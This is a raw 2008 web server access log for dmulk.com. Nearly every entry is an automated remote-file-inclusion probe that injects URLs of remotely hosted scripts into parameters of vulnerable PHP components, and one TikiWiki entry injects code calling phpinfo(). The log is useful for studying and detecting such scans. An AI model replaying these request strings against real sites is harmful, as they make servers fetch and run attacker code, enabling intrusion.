200.29.147.48 - - [17/Jun/2008:12:54:30 -0700] "GET /main.php?pagina=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:12:54:38 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:12:54:38 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:54:39 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:54:39 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:12:54:44 -0700] "GET /logs/index.php?screen=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:12:54:48 -0700] "GET /index.php?screen=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 200 18415 "-" "libwww-perl/5.805" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:54:50 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:54:51 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.147.56 - - [17/Jun/2008:12:54:52 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.40.147.56 - - [17/Jun/2008:12:54:55 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:12:55:04 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:12:55:05 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:55:32 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:55:32 -0700] "GET /logs/access_080110.log//login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:55:33 -0700] "GET /logs/access_080110.log//login.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:55:33 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:12:55:56 -0700] "GET /logs/index.php?include=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:12:56:00 -0700] "GET /index.php?include=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 200 18417 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:56:01 -0700] "GET /logs/main.php?pagina=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:12:56:01 -0700] "GET /main.php?pagina=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:12:56:02 -0700] "GET /logs/index.php?x=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:12:56:04 -0700] "GET /index.php?x=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:12:56:11 -0700] "GET /logs/index.php?include=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:56:12 -0700] "GET /logs/access_080308.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:56:13 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:56:14 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
87.106.98.71 - - [17/Jun/2008:12:56:14 -0700] "GET /index.php?include=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 18427 "-" "libwww-perl/5.805" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:56:14 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:56:17 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:56:19 -0700] "GET /logs/access_080228.log/index.php?get=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.76.110 - - [17/Jun/2008:12:56:21 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [17/Jun/2008:12:56:22 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:56:22 -0700] "GET /index.php?get=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 18395 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:56:23 -0700] "GET /logs/index.php?get=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:56:36 -0700] "GET /logs/access_080308.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:56:37 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
66.18.204.110 - - [17/Jun/2008:12:56:38 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
84.19.176.161 - - [17/Jun/2008:12:56:45 -0700] "GET /logs/access_080118.log/index.php?get=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:12:56:50 -0700] "GET /logs/access_080215.log/Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:12:56:51 -0700] "GET /Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:12:56:51 -0700] "GET /logs/Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:12:56:54 -0700] "GET /logs/access_080215.log/Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:12:56:54 -0700] "GET /Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:12:56:55 -0700] "GET /logs/Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:12:57:10 -0700] "GET /logs/services.php?page=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:12:57:10 -0700] "GET /services.php?page=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:12:57:49 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:12:57:49 -0700] "GET /errors.php?error=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:12:57:49 -0700] "GET /logs/errors.php?error=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:12:57:54 -0700] "GET /logs/access_071223.log/errors.php?error=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:58:10 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:58:11 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.127.70.91 - - [17/Jun/2008:12:58:16 -0700] "GET /logs/access_080308.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
216.127.70.91 - - [17/Jun/2008:12:58:16 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
65.55.211.39 - - [17/Jun/2008:12:58:16 -0700] "GET /bikes/dteel/15JAN08/?N=A HTTP/1.1" 200 710 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
216.127.70.91 - - [17/Jun/2008:12:58:16 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
62.141.56.36 - - [17/Jun/2008:12:58:28 -0700] "GET /logs/access.log/VirtueMart/com_virtuemart_1.1.0.j15/export.php?my_path=http://www.fingerxs.eu/modules/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [17/Jun/2008:12:58:28 -0700] "GET /VirtueMart/com_virtuemart_1.1.0.j15/export.php?my_path=http://www.fingerxs.eu/modules/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [17/Jun/2008:12:58:29 -0700] "GET /logs/VirtueMart/com_virtuemart_1.1.0.j15/export.php?my_path=http://www.fingerxs.eu/modules/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:12:58:40 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:12:58:40 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:12:58:40 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.70.91 - - [17/Jun/2008:12:59:00 -0700] "GET /logs/access_080308.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
216.127.70.91 - - [17/Jun/2008:12:59:00 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
216.127.70.91 - - [17/Jun/2008:12:59:00 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:59:09 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:59:09 -0700] "GET /htmltonuke.php?filnavn=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:59:14 -0700] "GET /logs/services.php?page=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:12:59:15 -0700] "GET /services.php?page=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:12:59:37 -0700] "GET /logs/main.php?pagina=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:12:59:37 -0700] "GET /main.php?pagina=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.36 - - [17/Jun/2008:12:59:46 -0700] "GET /logs/access_080215.log/VirtueMart/com_virtuemart_1.1.0.j15/export.php?my_path=http://www.fingerxs.eu/modules/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:59:51 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:59:56 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:59:56 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:59:57 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:59:58 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:13:00:00 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:13:00:01 -0700] "GET /logs/access_080221.log/components/com_performs/performs.php?mosConfig_absolute_path=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:13:00:14 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:13:00:15 -0700] "GET /htmltonuke.php?filnavn=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:13:00:21 -0700] "GET /logs/services.php?page=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:13:00:22 -0700] "GET /services.php?page=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:13:00:25 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:13:00:25 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:13:00:30 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:13:00:30 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.130.218 - - [17/Jun/2008:13:00:53 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://ghostx.net/x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
67.19.130.218 - - [17/Jun/2008:13:00:53 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://ghostx.net/x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
213.249.193.130 - - [17/Jun/2008:13:00:53 -0700] "GET /logs/index1.php?dat=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.72.152 - - [17/Jun/2008:13:00:53 -0700] "GET //errors.php?error=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.102.101.139 - - [17/Jun/2008:13:00:54 -0700] "GET /index1.php?dat=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.75.62.12 - - [17/Jun/2008:13:00:56 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.75.62.12 - - [17/Jun/2008:13:00:57 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:13:00:57 -0700] "GET /logs/index1.php?dat=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.130 - - [17/Jun/2008:13:00:58 -0700] "GET /index1.php?dat=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:13:01:01 -0700] "GET /index2.php?content=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
213.249.193.130 - - [17/Jun/2008:13:01:08 -0700] "GET /logs/index1.php?dat=ftp:ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:13:01:08 -0700] "GET /index1.php?dat=ftp:ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:01:11 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:01:14 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:01:15 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:01:41 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:01:41 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.4.2.69 - - [17/Jun/2008:13:01:55 -0700] "GET /logs//main.php?sayfa=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.4.2.69 - - [17/Jun/2008:13:01:58 -0700] "GET //main.php?sayfa=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:02:00 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:02:01 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:02:16 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:02:17 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.75.62.12 - - [17/Jun/2008:13:02:17 -0700] "GET /logs/access_080101.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:02:18 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.71.102.187 - - [17/Jun/2008:13:02:19 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [17/Jun/2008:13:02:21 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [17/Jun/2008:13:03:02 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [17/Jun/2008:13:03:04 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.75.62.12 - - [17/Jun/2008:13:03:15 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
91.197.136.30 - - [17/Jun/2008:13:03:18 -0700] "GET /logs/show.php?pg=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.197.136.30 - - [17/Jun/2008:13:03:19 -0700] "GET /show.php?pg=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.140.62 - - [17/Jun/2008:13:03:51 -0700] "GET /logs/access_080507.log/index2.php?url_page=http://www.nextenergy.pt/md.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
